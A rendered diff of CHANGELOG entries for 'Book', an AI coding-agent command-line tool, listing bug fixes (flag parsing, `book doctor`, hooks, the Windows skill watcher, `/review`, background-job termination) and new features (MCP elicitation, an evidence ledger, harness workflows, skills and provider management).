|
+
the same silent-wrong-directory hazard, just moved to the placement most people reach for first.
|
|
1935
|
+
The subcommand option no longer defaults to `process.cwd()`, so an unset one falls through to the
|
|
1936
|
+
root's value: all three placements — before the subcommand, after it, and after its positional
|
|
1937
|
+
arguments — now name the same directory. The CLI tests asserted only exit status, so the original
|
|
1938
|
+
regression arrived green with the commander 14 to 15 bump; they now assert the flag has an effect
|
|
1939
|
+
in every placement, and pin a marker into a workspace distinct from the fake `HOME` so an ignored
|
|
1940
|
+
flag cannot be rescued by the user-global layer resolving to the same file.
|
|
1941
|
+
|
|
1942
|
+
- **Root options written after a subcommand name became errors.** Positional option parsing rejects
|
|
1943
|
+
a root option that follows the subcommand, so `book config get model --settings <path>` started
|
|
1944
|
+
failing with `unknown option '--settings'` — an undocumented break, and a natural invocation,
|
|
1945
|
+
since the `config` action deliberately reads the root's `--settings`. `--settings` and
|
|
1946
|
+
`--no-settings` are re-declared on `config`, which prefers its own value and falls back to the
|
|
1947
|
+
root's; both flags work on either side of the subcommand again.
|
|
1948
|
+
|
|
1949
|
+
- **Running the CLI test suite could write settings into the repository.** The tests spawned the CLI
|
|
1950
|
+
from the checkout, so a bug that dropped `--workspace` wrote into the developer's real
|
|
1951
|
+
`.book/settings.local.json`; the guard meant to catch it skipped itself whenever that file already
|
|
1952
|
+
existed, which is the documented normal state for that scope — inert on exactly the machines that
|
|
1953
|
+
needed it. The child now runs from a scratch directory, so a stray write structurally cannot reach
|
|
1954
|
+
the repository, and the assertion fires everywhere.
|
|
1955
|
+
|
|
1956
|
+
- **`book doctor` now runs without a working credential.** Doctor resolved its config through the
|
|
1957
|
+
throwing `loadConfig`, so the single most common broken environment — no `BOOK_API_KEY` — killed
|
|
1958
|
+
it with an unhandled stack trace before it reached the `BOOK_API_KEY: (not set)` line it was
|
|
1959
|
+
about to print. The command a user reaches for when nothing works now reports a missing
|
|
1960
|
+
credential as a finding (`Credentials: not resolved`) instead of dying on it. A new
|
|
1961
|
+
`src/cli/subcommands.contract.test.ts` holds every non-interactive subcommand — `doctor`,
|
|
1962
|
+
`config`, `mcp list`, `tool-stats` — to running with no API key configured, so the class of
|
|
1963
|
+
regression cannot come back through another command. That guard covered only the missing
|
|
1964
|
+
credential, though: every other rejection — malformed JSON, a schema violation, an unknown
|
|
1965
|
+
`harness.workflow` — still escaped as a raw stack trace, which is the least useful possible
|
|
1966
|
+
response from the command whose job is diagnosing a broken setup. A configuration that will not
|
|
1967
|
+
load is now reported as `Configuration: FAILED TO LOAD` with the reason and the settings layers
|
|
1968
|
+
in the order they apply, so the offending file is named.
|
|
1969
|
+
|
|
1970
|
+
- **The `Stop` hook fires once per run instead of once per provider turn.** It ran inside the turn
|
|
1971
|
+
loop, so a task that took twelve tool-call turns invoked it twelve times — a hook meant to
|
|
1972
|
+
observe "the agent finished" observed "a round-trip finished". It now runs after the loop exits,
|
|
1973
|
+
once the terminal outcome is settled and before `SessionEnd`. Subagents no longer fire it at all:
|
|
1974
|
+
`Task` and managed agents run the same loop with the parent's hook config, and managed agents
|
|
1975
|
+
already report through `SubagentStop`, so one prompt that spawned three managed agents fired
|
|
1976
|
+
`Stop` four times — three of them naming a worktree as the workspace.
|
|
1977
|
+
- **`Stop` and `SessionEnd` now fire when a run is cancelled, and no longer warn on every Ctrl-C.**
|
|
1978
|
+
Both passed the run's abort signal to `runHooks`, which calls `signal.throwIfAborted()` ahead of
|
|
1979
|
+
its empty-hook-list guard. A cancelled run therefore skipped the hooks and logged
|
|
1980
|
+
`Stop hook failed: AbortError` — including for the majority of users who configure no terminal
|
|
1981
|
+
hooks at all. Cancellation is when a "the agent stopped" hook matters most, and neither hook has
|
|
1982
|
+
anything left to cancel by the time it runs, so neither takes the signal now.
|
|
1983
|
+
- **A denied skill activation no longer leaves a consent request open forever.** When a
|
|
1984
|
+
`permissions.deny` rule blocked an `InvokeSkill` call, the loop returned without the
|
|
1985
|
+
`denyConsent` that the interactive deny path performs, so `/skills` and the skill diagnostics
|
|
1986
|
+
showed a `skill_consent_requested` event with no resolution.
|
|
1987
|
+
- Hook events are documented in the README for the first time: which are awaited (all but `Stop`,
|
|
1988
|
+
and `SessionStart`/`SessionEnd` on the one-shot SDK path), and which can actually change the
|
|
1989
|
+
outcome. `PostToolUse` is awaited and rewrites tool output — it cannot veto a call, but a slow
|
|
1990
|
+
one delays every tool call by up to the 10 s hook timeout.
|
|
1991
|
+
- **The skill watcher no longer aborts the process on Windows when the workspace is reached through
|
|
1992
|
+
a short path or junction.** `fs.watch` was handed the path as given, but Windows reports
|
|
1993
|
+
directory-change events under the volume's canonical path, and libuv asserts the two match
|
|
1994
|
+
(`!_wcsnicmp(filename, dir, dirlen)` in `src/win/fs-event.c`). Watching a path with an 8.3 alias
|
|
1995
|
+
such as `C:\Users\RUNNER~1\…` failed that assertion, and a failed libuv assertion calls `abort()`
|
|
1996
|
+
— so the CLI died with no catchable error, and no `onError` handler could have caught it, as soon
|
|
1997
|
+
as a watched skill directory changed. Watched directories are now canonicalized with
|
|
1998
|
+
`realpathSync.native` first. POSIX behavior is unchanged. This was also the cause of the
|
|
1999
|
+
long-standing `Check (windows-latest, Node 24.x)` CI failures, where every test passed but two
|
|
2000
|
+
vitest workers exited unexpectedly: the runner's `%TEMP%` is an 8.3 alias, so the two tests that
|
|
2001
|
+
open real watchers aborted their workers.
|
|
2002
|
+
- The skill watcher no longer reopens every directory handle each time a skill file changes. A
|
|
2003
|
+
debounced rebuild now closes only the watchers whose directories left the watched set and opens
|
|
2004
|
+
only newly in-scope ones, instead of closing and reopening all of them. The old churn cost one OS
|
|
2005
|
+
directory handle per watched directory on every save, which is wasteful on every platform and
|
|
2006
|
+
worst on Windows, where each handle is a separate `ReadDirectoryChangesW` registration.
|
|
2007
|
+
- `SessionRuntime` now threads one set of skill-discovery options through both the skill registry
|
|
2008
|
+
and the skill watcher (`skillDiscoveryOptions`), so the two cannot disagree about which roots
|
|
2009
|
+
exist and tests can pin discovery inside a temp workspace instead of the real home directory.
|
|
2010
|
+
- `/review` no longer reports a clean review when it silently discarded findings. A reviewer pass
|
|
2011
|
+
whose report envelope parses but whose individual findings fail the per-finding contract (missing
|
|
2012
|
+
evidence, failure scenario, suggested fix, or a numeric confidence) is now recorded as `partial`
|
|
2013
|
+
rather than `completed`: the dropped count is reported in the coverage warning, the verdict is
|
|
2014
|
+
capped at `inconclusive`, and the reviewer's raw output is preserved so the lost findings are
|
|
2015
|
+
recoverable. Previously the report showed zero findings and a `clean` verdict with no indication
|
|
2016
|
+
anything had been dropped.
|
|
2017
|
+
- `/review` deduplication once again collapses the same defect reported by more than one reviewer.
|
|
2018
|
+
Findings are bucketed by category/file/line, then compared by summary similarity, so two lenses
|
|
2019
|
+
describing one defect in different words collapse to a single finding while two genuinely
|
|
2020
|
+
different defects on the same line stay separate. Deduplication had become sensitive to exact
|
|
2021
|
+
wording, which meant cross-reviewer duplicates — the case `--deep` produces most — survived into
|
|
2022
|
+
the report. The wording-sensitive key remains in use for the evaluation harness, where matching a
|
|
2023
|
+
specific finding is the point.
|
|
2024
|
+
- A user or project agent definition named `reviewer` is no longer discarded without a word. The
|
|
2025
|
+
built-in `reviewer` remains a trust boundary — a same-named definition still cannot replace its
|
|
2026
|
+
role, tools, isolation, or body — but the suppression is now recorded and reported by
|
|
2027
|
+
`book doctor`, naming the layer the ignored definition came from and pointing at
|
|
2028
|
+
`agents.profiles.reviewer` for the model/effort tuning that does apply.
|
|
2029
|
+
- The CLI now defaults `NODE_ENV` to `production` before React loads, so the TUI renders with
|
|
2030
|
+
production React instead of the 2-3x slower development build (an explicitly set `NODE_ENV`
|
|
2031
|
+
still wins). `npm run bench:ui` measures production mode to match. Combined with new render-path
|
|
2032
|
+
caching — a revision-stable transcript viewport snapshot, per-message row-estimate reuse in the
|
|
2033
|
+
virtualized transcript, a stable streaming timeline identity, memoized layout-revision hashing,
|
|
2034
|
+
and fast paths in `displayWidth` — long-transcript streaming updates and unrelated managed-trace
|
|
2035
|
+
updates render 3-4x faster and back inside their latency budgets.
|
|
2036
|
+
- Background shells and long-running Bash commands no longer make the TUI sluggish. Shell output
|
|
2037
|
+
events are coalesced to a 250ms refresh and the shell list bails out when nothing it renders has
|
|
2038
|
+
changed, so raw stdout/stderr chunk frequency no longer drives full App re-renders and Yoga
|
|
2039
|
+
layout passes. The shell detail view reads its output tail in a polling effect instead of doing
|
|
2040
|
+
synchronous file I/O inside App's render. Running tool rows tick their elapsed time once per
|
|
2041
|
+
second (previously 10x/s) with second granularity, and stop ticking entirely under reduced
|
|
2042
|
+
motion. Large tool-output previews measure bytes with one call over the whole output instead of
|
|
2043
|
+
allocating a Buffer measurement per line, and the markdown sniff over expanded output is
|
|
2044
|
+
memoized.
|
|
2045
|
+
- Managed children now publish and review evidence through their owning agent manager instead of
|
|
2046
|
+
being rejected as owned by another live Book process.
|
|
2047
|
+
- Provider-emitted `parent:`, `default:`, and `tool:` wrappers resolve to an existing registered
|
|
2048
|
+
tool, and `glob_files` resolves to `Glob`; unrelated namespaced commands remain rejected.
|
|
2049
|
+
- Vitest runs no longer append synthetic tool calls to the user-global `book tool-stats` history.
|
|
2050
|
+
- Windows now defaults to the full-frame TUI renderer so deep transcript scrolling cannot corrupt
|
|
2051
|
+
or erase the fixed input and status footer. Incremental rendering remains available through an
|
|
2052
|
+
explicit `BOOK_TUI_RENDERER=incremental` override.
|
|
2053
|
+
- Mouse-wheel scrolling now reaches conversation history when the Windows CLI runs from WSL,
|
|
2054
|
+
instead of being translated into Up/Down prompt-history navigation by the outer terminal.
|
|
2055
|
+
- Stopping a background job on Linux and macOS no longer records `killed` while the job's processes
|
|
2056
|
+
keep running. Background commands run through `sh -c`, which forks the real worker, so the shell
|
|
2057
|
+
wrapper dies from SIGTERM even when the worker ignores it — and both the persistent job runner
|
|
2058
|
+
and the session-lifetime shell manager read that wrapper's exit as proof the tree had gone, so
|
|
2059
|
+
they never escalated to SIGKILL. Termination now escalates and reports success based on whether
|
|
2060
|
+
the job's process group still holds a process, so an orphaned worker can no longer keep ports,
|
|
2061
|
+
file handles, and CPU behind a terminal `killed` record. Windows already terminated the tree
|
|
2062
|
+
through `taskkill /T /F` and is unchanged.
|
|
2063
|
+
- **Print/headless plan mode no longer auto-rejects the plan it asked for.**
|
|
2064
|
+
`book -p --permission-mode plan …` rejected every `ExitPlanMode` call unconditionally, so the
|
|
2065
|
+
model revised and resubmitted until `--max-turns` was gone and the run ended `failed`/`max_turns`
|
|
2066
|
+
with nothing to show for it. A host that supplies `onUserQuestionRequired` now decides the plan
|
|
2067
|
+
through that same handler — one question, `Approve` / `Reject`, with any other free-text answer
|
|
2068
|
+
taken as revision feedback — and `bypassPermissions` still approves automatically. A host with no
|
|
2069
|
+
handler cannot approve anything, so the run stops at the first plan and returns the plan as its
|
|
2070
|
+
deliverable: `text` prints the plan followed by an explicit "no changes were applied" line,
|
|
2071
|
+
`json` and `stream-json` add
|
|
2072
|
+
`plan: {status: "not_applied", reason, plan, message}`, the outcome is
|
|
2073
|
+
`completed`/`normal_completion`, and the process exits 0 — "finished and deliberately changed
|
|
2074
|
+
nothing" is expressed by `plan.status`, not by an exit code. The `plan_approval` stream event's
|
|
2075
|
+
`status` is now one of `approve`, `approve-fresh`, `reject`, `revise`, or `stop`.
|
|
2076
|
+
|
|
2077
|
+
### Added
|
|
2078
|
+
|
|
2079
|
+
- **A BYOK provider's model list can be filled in by hand, and an existing one can be updated
|
|
2080
|
+
without re-adding the provider.** The add-provider wizard used to fire model discovery the
|
|
2081
|
+
instant the API key was submitted, so an endpoint with no model-list API could only be
|
|
2082
|
+
configured by failing discovery first and taking the error screen's fallback. It now asks where
|
|
2083
|
+
the list should come from — discover automatically, or type the model IDs (comma-separate for
|
|
2084
|
+
several) — before any request is made; the post-failure fallback remains. For a provider that is
|
|
2085
|
+
already configured, selecting one of its models in `/model` or `/providers` exposes `Alt+R` to
|
|
2086
|
+
re-read the catalog from the endpoint and `Alt+M` to add model IDs by hand, both announced on the
|
|
2087
|
+
row itself and neither changing the active model or the stored credentials. Both follow the same
|
|
2088
|
+
ownership rule as `Alt+D` — only providers you added, since a catalog edit is written to
|
|
2089
|
+
`~/.book/settings.json` and applying one to a provider inherited from a project layer would copy
|
|
2090
|
+
that provider's credential into a second file and make the inherited copy look removable.
|
|
2091
|
+
- A refresh replaces what discovery previously returned, but **hand-entered models survive it**.
|
|
2092
|
+
They are recorded as `"manual": true` under `provider.<id>.models.<model>` for exactly this
|
|
2093
|
+
reason: they exist because the endpoint does not list them, so a refresh that dropped them
|
|
2094
|
+
would undo the user's work every time. The marker is cleared once discovery starts returning
|
|
2095
|
+
that id on its own.
|
|
2096
|
+
- Adding models to an existing provider no longer rewrites its `baseURL` and `apiKey` with the
|
|
2097
|
+
values the caller happened to carry. Previously `providerConfigFromDraft` always wrote both,
|
|
2098
|
+
which also meant a provider configured with the legacy lowercase `baseUrl` key failed schema
|
|
2099
|
+
validation on refresh instead of saving. Writing a `baseURL` now retires any legacy `baseUrl`
|
|
2100
|
+
beside it, which would otherwise linger in `settings.json` as a stale value that reads as live.
|
|
2101
|
+
- An endpoint that returns an empty list is reported on both paths. A refresh used to throw while
|
|
2102
|
+
picking an active model out of the empty result; the wizard used to drop the user on an empty
|
|
2103
|
+
"Choose models" screen that answered `Enter` with "Select at least one model." and offered no
|
|
2104
|
+
way forward.
|
|
2105
|
+
- The highlighted model no longer slides out from under the cursor when a catalog changes.
|
|
2106
|
+
Model ids are sorted, so a refresh or a manual add re-orders the list and the highlight used to
|
|
2107
|
+
stay on an index rather than a model — `Enter` could then save a neighbouring model as the
|
|
2108
|
+
default. The selection is re-anchored on the id it was on.
|
|
2109
|
+
- **Slash commands work in print/headless mode.** `book -p /security-review`, `book -p /init`, and
|
|
2110
|
+
any `.book/commands/*.md` command now resolve through the same registries, the same
|
|
2111
|
+
`$1..$9` / named-argument / `${BOOK_*}` / shell substitution, and the same `allowed-tools` and
|
|
2112
|
+
`model` frontmatter enforcement as the TUI, instead of being handed to the model as literal text.
|
|
2113
|
+
Commands that need an interactive surface — session controls, pickers, panels, `/config`,
|
|
2114
|
+
`/export`, `/memory` — are refused _before_ their own code runs, so none of their side effects can
|
|
2115
|
+
half-fire in a host that could not show the result; the error lists what is supported and the run
|
|
2116
|
+
exits 1. A `/name` that is not a command at all is still forwarded verbatim, so an ordinary prompt
|
|
2117
|
+
beginning with a path is unaffected. A command the host performed itself is reported as a
|
|
2118
|
+
`command_result` stream-json event and as `result.commandResults` in every output format,
|
|
2119
|
+
including the SDK. `expandSlashCommands: false` on `HeadlessOptions` forwards every prompt
|
|
2120
|
+
verbatim, for hosts relaying untrusted end-user text.
|
|
2121
|
+
- **`/review` runs outside the TUI.** `book -p /review`, `--deep`, `--base <ref>`, path scopes, and
|
|
2122
|
+
`<base>...<head>` all execute the same host-orchestrated pipeline — the host still resolves the
|
|
2123
|
+
review target and the reviewers still receive an immutable diff and no diff tool — and emit a
|
|
2124
|
+
stable machine report under `--output-format json` / `stream-json`: `verdict`, `target`,
|
|
2125
|
+
`findings` as `ReviewFinding` values verbatim, and the pipeline's own `coverage`, with the
|
|
2126
|
+
unified diff deliberately omitted. The sequencing that used to live in `src/tui/app.tsx` moved
|
|
2127
|
+
into `src/review/host.ts`, so the two hosts cannot drift apart. `--fix` stays interactive-only: a
|
|
2128
|
+
non-interactive host cannot approve a patcher's tool calls, so it is refused with an explanation
|
|
2129
|
+
instead of editing and committing unattended. A review that could not run — a bad ref,
|
|
2130
|
+
`agents.mode = off`, an unknown option — exits 1; an inconclusive _verdict_ does not, because the
|
|
2131
|
+
review ran.
|
|
2132
|
+
|
|
2133
|
+
- A `Maintenance` CI workflow (`.github/workflows/maintenance.yml`) that runs the deterministic half
|
|
2134
|
+
of the nightly maintenance work: a knip dead-code report on every pull request and on a daily
|
|
2135
|
+
schedule, and a scheduled `npm audit` that keeps a single rolling `Dependency security advisories`
|
|
2136
|
+
issue in sync. The dead-code scan now reads a committed `knip.json` and a pinned `knip`
|
|
2137
|
+
devDependency instead of an ad-hoc config and an unpinned `npx knip@6`, so its results are
|
|
2138
|
+
reproducible between runs. New scripts: `deadcode:check`, `deadcode:report`, `deadcode:json`.
|
|
2139
|
+
- The harness run evidence ledger writes through a durability backend seam, and a SQLite backend
|
|
2140
|
+
(`node:sqlite`, WAL with `synchronous = FULL`) joins the existing append-only JSONL writer. The
|
|
2141
|
+
JSONL writer cannot prove durability — Node exposes no portable directory fsync — so its seals
|
|
2142
|
+
always reported `directorySync: unavailable` and every run stayed
|
|
2143
|
+
`evidenceEligibility: ineligible`, which no host could ever satisfy. The SQLite backend commits
|
|
2144
|
+
records and the seal as transactions and seals as `eligible`. Record framing, the monotonic
|
|
2145
|
+
sequence, and the SHA-256 hash chain are byte-identical across backends, so a stream verifies the
|
|
2146
|
+
same way regardless of which wrote it, and a backend that cannot prove a guarantee still fails
|
|
2147
|
+
closed — the SQLite backend reads its `journal_mode` and `synchronous` pragmas back and reports
|
|
2148
|
+
`unavailable` when the filesystem refused WAL, rather than trusting the request. The seal now also
|
|
2149
|
+
records which backend made the claim. JSONL remains the default and the SQLite backend is not yet
|
|
2150
|
+
selectable through settings, so this changes what the ledger _can_ attest, not yet what it does.
|
|
2151
|
+
- Experimental execution workflows for the observe-mode harness. `harness.workflow` (settings) and
|
|
2152
|
+
`--harness-workflow <id>` (run-scoped) select one of three validated built-ins — `minimal`,
|
|
2153
|
+
`safe-edit`, and `verify-heavy` — from a hashed registry. `minimal` renders no prompt text and
|
|
2154
|
+
leaves provider messages byte-identical to a run with no harness. Workflows are bounded guidance
|
|
2155
|
+
only: permissions, sandboxing, budgets, retries, compaction, checkpoint/resume, and tool contracts
|
|
2156
|
+
remain host-owned, unsupported requests are clamped and recorded as `capability_clamped` evidence,
|
|
2157
|
+
and a definition's free-form description is never rendered as an instruction. Every run records the
|
|
2158
|
+
requested and effective workflow, source, reason, registry/definition digests, override scope, and
|
|
2159
|
+
declared complexity. Selection fails closed — a workflow chosen while `harness.mode` is `off`, an
|
|
2160
|
+
unknown ID, or a path-like ID is rejected by `book config set` and at startup rather than silently
|
|
2161
|
+
ignored. Project-defined workflow files are not loaded.
|
|
2162
|
+
- MCP servers can now prompt the user mid-tool-call through form elicitation. The TUI renders the
|
|
2163
|
+
requested fields — text, number, yes/no, and filterable choice lists — labelled with the server
|
|
2164
|
+
that asked, and returns the answer inside the open call; declining or cancelling answers the
|
|
2165
|
+
server instead of leaving it waiting. The elicitation capability is declared only when a host can
|
|
2166
|
+
actually prompt, so headless and SDK runs (unless they pass `onElicit`) leave servers to fail such
|
|
2167
|
+
requests themselves rather than block. Answers are validated against the requested schema before
|
|
2168
|
+
they are sent, and requests Book cannot render faithfully — URL mode, or schemas outside the
|
|
2169
|
+
protocol's primitive subset — are declined.
|
|
2170
|
+
- MCP now uses the official protocol SDK and works in the interactive TUI as well as print and SDK
|
|
2171
|
+
runs. It supports stdio, Streamable HTTP, and legacy SSE servers; content blocks, structured
|
|
2172
|
+
errors, cancellation, pagination, negotiated metadata, dynamic `tools/list_changed` refresh,
|
|
2173
|
+
bounded diagnostics, and graceful remote-session termination. Project `.mcp.json` servers require
|
|
2174
|
+
fingerprinted one-time approval, while `/mcp`, `book mcp list|get|add|remove`, `book doctor`, and
|
|
2175
|
+
server-scoped permission rules (`mcp__server`) expose and control the resulting surface without
|
|
2176
|
+
printing header or environment secrets.
|
|
2177
|
+
- `harness.mode: observe` now records an append-only run-evidence ledger without changing run
|
|
2178
|
+
behavior. Every root user request gets one canonical JSONL stream under
|
|
2179
|
+
`BOOK_HOME/projects/<workspace-id>/harness/v1/runs/`, written by a single writer with canonical
|
|
2180
|
+
JSON records, a SHA-256 previous-record hash chain, and a signed terminal seal that reports
|
|
2181
|
+
durability, drop/error counters, and fail-closed evidence eligibility. Persisted events pass an
|
|
2182
|
+
allowlist redaction policy (no prompts, tool arguments or output, file paths, commands, URLs, or
|
|
2183
|
+
secrets); turn, tool, usage, retry, stall, permission, and managed-agent handoff facts are
|
|
2184
|
+
captured as bounded scalars with OpenTelemetry-mapped names pinned to Semantic Conventions
|
|
2185
|
+
v1.44.0. Headless multi-turn runs defer each root seal until linked continuation turns finish;
|
|
2186
|
+
managed continuations join the originating root stream as explicit child runs. Retention cleanup
|
|
2187
|
+
honors evidence pins, truncated or tampered streams read as inspectable-but-incomplete, and
|
|
2188
|
+
`off` remains the inert default with no filesystem effect.
|
|
2189
|
+
- `/review` is now a host-orchestrated pipeline instead of an ordinary agent prompt. Book resolves
|
|
2190
|
+
the change once into an immutable review target (base commit, changed files, and a unified diff
|
|
2191
|
+
including untracked files) and hands it to read-only `reviewer` agents, so a review cannot widen
|
|
2192
|
+
its own scope or drift onto unrelated changes. New flags: `--base <ref>`, `--deep`, `--fix`, plus
|
|
2193
|
+
a path or `<base>...<head>` range argument. `--deep` fans out four specialized lenses
|
|
2194
|
+
(correctness, security, simplification, efficiency), deduplicates and confidence-filters their
|
|
2195
|
+
findings, then runs an independent falsification pass that must return one verdict per candidate.
|
|
2196
|
+
Coverage is explicit: a failed, timed-out, or unstructured pass caps the verdict at
|
|
2197
|
+
`inconclusive` rather than reporting a clean review, and output that fails the JSON contract is
|
|
2198
|
+
preserved verbatim instead of discarded. `--fix` applies only verified findings through the
|
|
2199
|
+
patcher → validator evidence pipeline, where a distinct validator must approve the exact patch
|
|
2200
|
+
candidate.
|
|
2201
|
+
- A `REVIEW.md` at the workspace root calibrates reviews for the repository. It is injected as
|
|
2202
|
+
calibration only and cannot change the output contract, disable verification, or broaden reviewer
|
|
2203
|
+
tools.
|
|
2204
|
+
- New built-in `reviewer` managed-agent profile (read-only, no diff tool) backing `/review`. It is a
|
|
2205
|
+
trust boundary: a project agent definition of the same name cannot replace its role, tools,
|
|
2206
|
+
isolation, or body.
|
|
2207
|
+
- `npm run eval:review -- <fixtures.json>` scores review output against a golden set — precision,
|
|
2208
|
+
recall, F1, usefulness rate, and signal-to-noise ratio — from reports captured on real runs. See
|
|
2209
|
+
`evals/review/fixtures.example.json`.
|
|
2210
|
+
- New empty startup sessions now open with an optional full-screen magical fire sequence that
|
|
2211
|
+
burns into the Book welcome. It is deterministic, skippable with Esc or typing, automatically
|
|
2212
|
+
bypassed for reduced-motion and screen-reader modes, and configurable through `/config` or
|
|
2213
|
+
`ui.startupAnimation`.
|
|
2214
|
+
- Adaptive-harness evaluations now have a reusable external-process runner that provisions fresh
|
|
2215
|
+
workspace, `BOOK_HOME`, user-config, cache, and temporary directories; copies only explicitly
|
|
2216
|
+
allowlisted ambient variables; bounds captured output; and distinguishes failure, timeout,
|
|
2217
|
+
cancellation, and spawn errors. Timeout and cancellation terminate the evaluator process tree
|
|
2218
|
+
with bounded graceful and forced teardown. This is a reproducibility boundary for trusted
|
|
2219
|
+
built-in fixtures, not a security sandbox for project-controlled commands. `npm run eval:edit`
|
|
2220
|
+
now runs every trial through this boundary with managed agents disabled and generated isolated
|
|
2221
|
+
settings that preserve the resolved provider-facing model ID, model metadata, retry policy, and
|
|
2222
|
+
whether output-token and reasoning-effort options were explicitly configured. The provider-backed
|
|
2223
|
+
`npm run eval:compact` benchmark now uses the same isolated settings and secret references, and
|
|
2224
|
+
`npm run eval:skills` parses its observation corpus in a bounded disposable worker. Ambient run
|
|
2225
|
+
snapshots now use schema version 2 to identify isolated evaluation Book-home contents with a
|
|
2226
|
+
bounded secret-safe digest while normalizing evaluator-owned temporary paths and run IDs. The
|
|
2227
|
+
same snapshot now fingerprints effective command and skill registries from content digests
|
|
2228
|
+
without retaining command or skill bodies. The runner now owns and reports prompt date, random
|
|
2229
|
+
seed, exact dirty/untracked runtime revision, and materialized-fixture revision. Provider-backed
|
|
2230
|
+
edit and compaction evaluations fail closed unless terminal, ambient, accounting, usage, pricing,
|
|
2231
|
+
model identity, Book-home isolation, and single-agent run-boundary evidence are eligible;
|
|
2232
|
+
paired compact comparisons also reject mismatched ambient, pricing, budget, or resolved-model
|
|
2233
|
+
identities; compact reports use schema version 3 and evaluator workers reject stale or malformed
|
|
2234
|
+
report shapes;
|
|
2235
|
+
compaction includes reducer calls and treats retried or usage-less attempts as partial evidence.
|
|
2236
|
+
Offline skill-observation reports explicitly mark provider-run eligibility as not applicable while
|
|
2237
|
+
retaining the same runner controls. These changes make Tier A/B ready for trusted built-in Phase 0
|
|
2238
|
+
work without admitting Tier C project-controlled or adversarial execution.
|
|
2239
|
+
- Architecture checks now keep offline harness evaluation code out of the live agent runtime,
|
|
2240
|
+
prevent evaluators from importing live execution modules, and keep permission/sandbox kernel
|
|
2241
|
+
modules independent from harness policy.
|
|
2242
|
+
- `BOOK_HOME` can now relocate Book's user-global state from `~/.book`, including settings,
|
|
2243
|
+
sessions, memory, managed-agent state, jobs, rewind snapshots, telemetry, tool output, MCP
|
|
2244
|
+
configuration, and user-level discovery. Project-local `.book/` state remains unchanged.
|
|
2245
|
+
- `/skills` now opens a keyboard-driven skill manager with Codex/Claude Code-inspired
|
|
2246
|
+
visibility controls (`auto`, `name-only`, `manual`, and `off`), explicit-use handoff,
|
|
2247
|
+
scope/path details, reload support, and a matching entry in `/config`.
|
|
2248
|
+
- Skills now use metadata-first `SKILL.md` discovery with portable `.agents/skills` compatibility,
|
|
2249
|
+
`.claude/skills` and OpenCode roots, lazy bodies/resources, scoped tool intersections, consent
|
|
2250
|
+
policies, lifecycle diagnostics, and debounced safe-boundary reloads. Existing `.book/skills`
|
|
2251
|
+
packages continue to work; third-party skills can be migrated by placing the same package under
|
|
2252
|
+
`.agents/skills/<name>/`. `/skills status` provides a body-free runtime report with catalog and
|
|
2253
|
+
prompt-omission diagnostics, active frames, effective tools, validation failures, and recent
|
|
2254
|
+
lifecycle outcomes. Conflicting skill restrictions now fail visibly instead of activating an
|
|
2255
|
+
empty tool surface, resource reads verify content digests against post-discovery substitution,
|
|
2256
|
+
and `npm run eval:skills` gates implicit rollout using privacy-safe activation metrics. Newly
|
|
2257
|
+
discovered skills default to explicit/manual use until that evaluation supports enabling `auto`.
|
|
2258
|
+
|
|
2259
|
+
- Unified `/jobs` TUI management for managed agents and background shell jobs, with `/tasks` kept
|
|
2260
|
+
as an alias. Background shells support session or explicit persistent lifetimes, bounded output,
|
|
2261
|
+
optional parent-agent completion delivery, restart reattachment, stop/dismiss controls, and SDK/
|
|
2262
|
+
stream-json lifecycle events. Finished and stopped shell rows leave the active UI automatically
|
|
2263
|
+
while a one-time completion notice remains available.
|
|
2264
|
+
|
|
2265
|
+
- Streaming assistant responses now use the same Markdown layout as completed replies while
|
|
2266
|
+
keeping a bounded, throttled live tail for responsive rendering of large outputs.
|
|
2267
|
+
|
|
2268
|
+
- `/config` now opens a visual settings menu for model, effort, theme, memory capture, and
|
|
2269
|
+
subagent profile models. Explorer, patcher, validator, and custom profiles can select an
|
|
2270
|
+
existing configured model or reset to parent-model inheritance without editing JSON.
|
|
2271
|
+
|
|
2272
|
+
- `AskUserQuestion` now explicitly advertises single- and multi-select questions to models.
|
|
2273
|
+
|
|
2274
|
+
- Added terminal-screen regression coverage and made patched Ink incremental rendering the default
|
|
2275
|
+
interactive mode through `BOOK_TUI_RENDERER`. The stable full-frame renderer remains available
|
|
2276
|
+
as `BOOK_TUI_RENDERER=safe`, while active TUI animations share pausable clocks to reduce render
|
|
2277
|
+
churn.
|
|
2278
|
+
|
|
2279
|
+
- Persistent tool-use telemetry and a `book tool-stats` subcommand for measuring tool use across
|
|
2280
|
+
sessions. Each finalized tool call appends one JSON line to `~/.book/telemetry/tool-use.jsonl`
|
|
2281
|
+
(best-effort, off the hot path, size-rotated; captured at the final-status point so plan/user
|
|
2282
|
+
mutations are reflected), recording the tool, status, a derived `isFailure` flag (only `error`/
|
|
2283
|
+
`timed_out` — blocks/cancellations never count), error code, duration, retries, model, and
|
|
2284
|
+
subagent attribution. `book tool-stats` reports per-tool calls/fail rate/p50/p95/retry rate, a
|
|
2285
|
+
per-model split, and top error codes (`--json`, `--since <days>`, `--all`, `--prune`). Gated by
|
|
2286
|
+
`observability.toolTelemetry` (default on) with `observability.toolTelemetryRetentionDays` as the
|
|
2287
|
+
reporting/prune window. Separate from the ephemeral in-session counters in `/usage`.
|
|
2288
|
+
|
|
2289
|
+
- Fresh-context plan handoff: an "Approve, fresh context" option (shortcut `F`) at the plan-approval
|
|
2290
|
+
prompt stops the planning turn and starts a new conversation seeded with only the approved plan —
|
|
2291
|
+
the implementation runs with a clean context window, like Codex/Claude Code handoff.
|
|
2292
|
+
- Model-conditional mutation guidance: the system prompt recommends `ApplyPatch` to GPT/Codex-family
|
|
2293
|
+
models (known picker models resolve by provider metadata) and exact-replace `Edit`/`MultiEdit` to
|
|
2294
|
+
everything else, with a per-model `editFormat` (`patch` | `replace` | `whole`) settings override
|
|
2295
|
+
under `provider.<name>.models.<id>`. In plan mode the guidance instead directs the model to
|
|
2296
|
+
explore read-only and call `ExitPlanMode`.
|
|
2297
|
+
- Cross-harness tool-argument aliases, declared on each tool definition: Claude Code-style
|
|
2298
|
+
spellings (`file_path`, `old_string`, `new_string`, `replace_all`, nested MultiEdit `edits[]`
|
|
2299
|
+
keys, Grep `glob`/`-A`/`-B`/`-C`, ApplyPatch `input`) normalize to canonical arguments before
|
|
2300
|
+
hook and permission evaluation — aliased spellings cannot bypass path-scoped permission rules —
|
|
2301
|
+
and `invalid_arguments` errors list the allowed argument names.
|
|
2302
|
+
- Grep `path` (directory or file scope) and `C` (symmetric context) parameters on both the native
|
|
2303
|
+
`rg` and portable backends; scoped portable searches still honor root-anchored `.gitignore`
|
|
2304
|
+
patterns.
|
|
2305
|
+
